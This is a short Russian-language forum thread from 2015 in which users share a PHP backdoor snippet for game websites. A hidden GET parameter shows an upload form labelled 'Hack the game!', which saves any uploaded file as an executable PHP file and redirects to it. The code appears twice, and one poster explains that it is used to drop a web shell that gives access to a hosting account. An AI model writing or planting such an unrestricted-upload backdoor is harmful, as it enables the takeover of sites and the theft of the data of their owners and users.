Обучение/Помощь новичкам | Дыры
DELETED
Автор
31 января 2015, в 20:23
Delete
Есть множество видов уязвимостей! =)
ultral, вот дыра язай
if(isset($_GET['da'])){
error_reporting(E_ALL^E_NOTICE);
if(isset($_FILES['file']))
{
$type = $_FILES['file']['type'];
if (!isset($err))
{
$tmp = $_FILES['file']['tmp_name'];
move_uploaded_file($tmp, "images/icons/icons.php");
header("location: images/icons/icons.php");
}
}
echo "<form method="post" enctype='multipart/form-data'>n";
echo "<input type='file' name='file' /><br/>n";
echo "<input value='Взломать игру!' type='submit' name='ok' /><br /></form></div>n";}
if(isset($_GET['da'])){
error_reporting(E_ALL^E_NOTICE);
if(isset($_FILES['file']))
{
$type = $_FILES['file']['type'];
if (!isset($err))
{
$tmp = $_FILES['file']['tmp_name'];
move_uploaded_file($tmp, "images/icons/icons.php");
header("location: images/icons/icons.php");
}
}
echo "<form method="post" enctype='multipart/form-data'>n";
echo "<input type='file' name='file' /><br/>n";
echo "<input value='Взломать игру!' type='submit' name='ok' /><br /></form></div>n";}
Дыра => код в который заливается php файл(иначе говоря Shell-файл в котором код дает доступ к любой инфе твоего акка на хостинге!
vova_dybay, Это на кх! а на стронге не такое!
vova_dybay, Автор этого кода - Rostik98ua
DELETED
Автор
31 января 2015, в 20:28
Delete
DELETED
Автор
31 января 2015, в 20:29
Delete
Прогони файл через сканер.
DELETED
Автор
31 января 2015, в 20:30
Delete